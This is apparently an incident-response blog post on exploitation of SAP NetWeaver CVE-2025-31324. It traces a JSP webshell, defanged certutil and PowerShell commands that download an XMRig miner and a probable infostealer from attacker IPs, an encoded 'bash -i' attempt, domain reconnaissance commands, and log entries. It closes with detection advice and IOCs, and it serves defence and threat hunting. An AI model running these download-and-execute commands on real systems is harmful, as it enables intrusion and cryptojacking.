SAP NetWeaver CVE-2025-31324 Exploitation

by Rob Anderson

30 April 2025

 

 

SAP NetWeaver CVE-2025-31324 Exploitation

On the 29th April 2025, a vulnerability in SAP Netweaver was added to CISA’s known exploited vulnerability (KEV) catalogue - CVE-2025-31324. The vulnerability was reported as being exploited on 22/04/2025 by ReliaQuest, who reported unauthorised file uploads and malicious code execution on SAP NetWeaver systems. WithSecure was aware of exploitation campaigns targeting SAP and had already begun actively hunting over customer estates. SAP released a patch for the vulnerability on 26/04/2025, but stated that they did not have any evidence that this vulnerability was exploited as a zero-day.

CVE-2025-31324 is a critical zero-day vulnerability in SAP NetWeaver's Visual Composer component, specifically impacting version 7.50. NetWeaver is a platform that serves as a foundation for SAP’s enterprise applications such as SAP ERP, SAP CRM and SAP BW. Multiple other security researchers reported what they believed to be exploitation of CVE-2025-31324 soon after.

This proof of concept (POC) exploit code for this vulnerability has since been publicly released, and as of the release date of this blog, is being actively discussed in deep and dark web criminal forums, with actors seeking to monetise footholds in organisations attained through exploitation of CVE-2025-31324.

WithSecure detected an attack that first began with the exploitation of CVE-2025-31324 in March 2025, suggesting that this vulnerability has been known to criminals and exploited for some time. 

Threat Hunting: Uncovering Certutil Misuse via Webshell for XMRig Coin Miner Deployment

During a recent threat hunting operation, WithSecure IR identified a sophisticated attack leveraging a webshell to misuse the Windows utility certutil to deploy the XMRig coin miner.  This was rapidly followed by other reconnaissance activities, probably indicating that multiple threat actors had compromised the device. This incident underscores the critical need for vigilant monitoring of unusual system activities and the abuse of legitimate tools.

Incident Overview

On 29/04/2025, WithSecure IR detected malicious activity involving the execution of the following command via a webshell on an Internet facing SAP NetWeaver server:

cmd /c certutil -urlcache -split -f hxxp://23.95.123[.]5:666/xmrigCCall/1110.exe C:\Users\Public\1110.exe

This command, executed through a webshell file named helper.jsp, leveraged certutil, a legitimate Windows tool for managing certificates, to download and attempt to execute a malicious payload. CertUtil has been known to be abused by threat actors to as a Living Off the Land tool in this way for some time. The payload was identified as XMRig, a well-known coin miner notorious for its exploiting system resources in cryptojacking attacks. The payload was retrieved from a suspicious IP address (23.95.123[.]5:666) and saved to C:\Users\Public\1110.exe. A similar command was observed 3 days earlier on 26/04/2025, retrieving and deploying another payload (s.exe) from the same location, indicating multiple attempts to deploy the miner, all of which were blocked by WithSecure Elements.

Initial exploitation

SAP NetWeaver CVE-2025-31324 enables unauthenticated attackers to upload malicious files to NetWeaver servers. The issue stems from insufficient file validation in the /developmentserver/metadatauploader endpoint. By sending crafted POST requests, attackers can upload malicious JavaServer Pages (JSP) webshells into the j2ee/cluster/apps/sap.com/irj/servletjsp/irj/root/ directory. These webshells can then be triggered via GET requests, enabling remote command execution and giving attackers remote access and control over the host. The activity observed in this compromise matches the expected post-compromise behaviour from exploitation of CVE-2025-31324, and so it is highly likely that this CVE was the initial method of compromise.

Evidence suggests the first compromise of CVE-2025-31324 in this incident occurred on 18/03/2025, when a threat actor deployed the helper.jsp webshell file. 

Webshell Details

  • Location: D:\usr\sap\POP\J00\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root\helper.jsp
  • Size: 906 bytes
  • Created: 18/03/2025 08:16:03
  • SHA1 Hash: 925f6bc2a3fb5bb15a434f5f42196d49f36459e3

The webshell deployment was corroborated by a log entry in the SAP NetWeaver system (local time):

responses_00.3.trc:[18/03/2025 09:16:03] - 10.0.x.x : POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1 200 43 [109]

This log indicates a successful POST request, likely used to upload the webshell, enabling persistent access to the compromised system. 

Webshell Activity and XMRig Deployment

The webshell was used to execute multiple malicious commands. On 26/04/2025, the following command was executed:

cmd /c certutil -urlcache -split -f hxxp://23.95.123[.]5:666/xmrigCCall/s.exe C:\Users\Public\s.exe

With a parent process of
D:\usr\sap\POP\J00\exe\jstart.EXE -appTrc -nodeId=2 pf=\\SYSTEM01\sapmnt\POP\SYS\profile\POP_J00_SYSTEM01 -DSAPINFO=POP_00_server0 -hostvm -nodeName=ID555550 -file=D:\usr\sap\POP\J00\j2ee\cluster\instance.properties -jvmFile=D:\usr\sap\POP\J00\work\jstart.jvm -traceFile=D:\usr\sap\POP\J00\work\dev_server0 -javaOutFile=D:\usr\sap\POP\J00\work\

On 29/04/2025, a similar command was executed, as evidenced by the following log entry:

[29/04/2025 01:20:53] - 10.0.x.x : GET /irj/helper.jsp?cmd=cmd%20/c%20certutil%20-urlcache%20-split%20-f%20hxxp://23.95.123[.]5:666/xmrigCCall/1110.exe%20C:%5CUsers%5CPublic%5C1110.exe HTTP/1.1 200 360 [47]

This log confirms that the webshell facilitated the download of the XMRig payload (1110.exe) to C:\Users\Public\1110.exe, with a successful HTTP response (200). The use of the same malicious infrastructure (23.95.123[.]5:666) across both commands suggests these activities were part of the same campaign.

Additional activity was observed on 28/04/2025, when the webshell was used to attempt a base64-encoded bash command, likely part of an automated exploitation attempt:

[28/04/2025 05:26:16] - 10.0.x.x : GET /irj/helper.jsp?cmd=bash%20-c%20%7Becho%2C....%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D HTTP/1.1 500 841 [15]

This failed attempt to execute Linux commands (bash) on a Windows system indicates the attacker employed blind, OS-agnostic exploitation scripts, a common tactic in XMRig campaigns targeting vulnerable systems.

On 29/04/2025, further commands were executed via the webshell, indicating reconnaissance and attempting to download a probable infostealer executable.

  • whoami
  • net group "domain computers" /domain
  • net user /domain
  • powershell Invoke-WebRequest -Uri "hxxp://65.49.235[.]210/download/2.jpg" -OutFile "cmake.exe"

Executable Details

  • SHA1 Hash: 272b2fc48f6cbbf105cbe961b163de99e761b31d
  • IMPHASH: c26e06ea6e5c59be8d491b77792f43e6
  • Contacted URL’s: hxxps://65.49.235[.]210/_api/web/

These commands were used to gather information about the environment, map the network, and identify privileged accounts for potential lateral movement – this is contrary to previous XMRig campaigns.

Considering the Bash/Linux commands issued via the webshell on the 28/04/2025, and the windows reconnaissance commands on the 29/04/2025, it seems likely that at least 2 additional actors were taking advantage of the presence of the webshell – hijacking its original use. The actor who originally exploited the server knew it was a Windows server, and would not have run Bash commands against it. They also seemingly rapidly achieved their goal of deploying a cryptominer, which did not need further lateral movement or reconnaissance after its deployment. This then is interesting, as these later actors were not scanning for and exploiting the vulnerability for access to the server – they were specifically scanning for and using the webshell that had been deployed as part of another actor’s campaign.

Response and Mitigation

Upon discovery, WithSecure promptly contacted the client, who took immediate action to contain the incident:

  • System Isolation: The compromised system was isolated to prevent further malicious activity.
  • Patching: The client applied patches to address CVE-2025-31324 in SAP NetWeaver, closing the initial attack vector.
  • Eradication: The webshell (helper.jsp) was removed and the XMRig payloads were automatically blocked by WithSecure’s DeepGuard protection.

 

Lessons Learned

This incident highlights several critical takeaways for incident response and threat hunting teams:

  • Monitor Host Activity: Webshells like helper.jsp provide persistent access and enable the execution of malicious commands, such as certutil misuse. Monitoring for unauthorised JSP files or unusual HTTP requests (e.g., POST to /developmentserver/metadatauploader or GET requests with encoded commands) is critical.
  • Detect Legitimate Tool Misuse: Tools like certutil are often abused to evade detection. Monitoring for unusual command-line arguments, such as -urlcache with external URLs, is essential.
  • Patch Management: Timely patching of vulnerabilities, such as CVE-2025-31324, can prevent initial access and subsequent exploitation.
  • Log Analysis: Detailed logging, as seen in the SAP NetWeaver logs, is invaluable for reconstructing attack timelines and identifying webshell activity.
  • Proactive Threat Hunting: Regular threat hunting can uncover early signs of compromise, such as webshells, before they are used to deploy malicious payloads like XMRig.

 

Conclusion

The use of an exploit to deploy a webshell to leverage the local, legitimate binary certutil in order to deploy XMRig demonstrates the sophistication of modern cyber threats. The attacker’s exploitation of CVE-2025-31324 to deploy the webshell enabled persistent access, facilitating multiple attempts to install coin miners. This webshell was then taken advantage of even further by other actors in further compromise attempts. Fortunately, by combining proactive threat hunting, robust patch management, and rapid incident response, organisations can mitigate the risks posed by such attacks. This incident serves as a reminder to remain vigilant and adapt to the ever-changing threat landscape.

It is almost certain that due to the celebrity of this vulnerability, and the availability of exploit code, a broad-spectrum of threat actors will seek to exploit this vulnerability, with activity not just limited to resource-jacking / cryptocurrency mining.

For further inquiries or assistance with threat hunting and incident response, contact our team at WithSecure.

IOC

  • 272b2fc48f6cbbf105cbe961b163de99e761b31d
  • 925f6bc2a3fb5bb15a434f5f42196d49f36459e3
  • 65.49.235[.]210
  • 23.95.123[.]5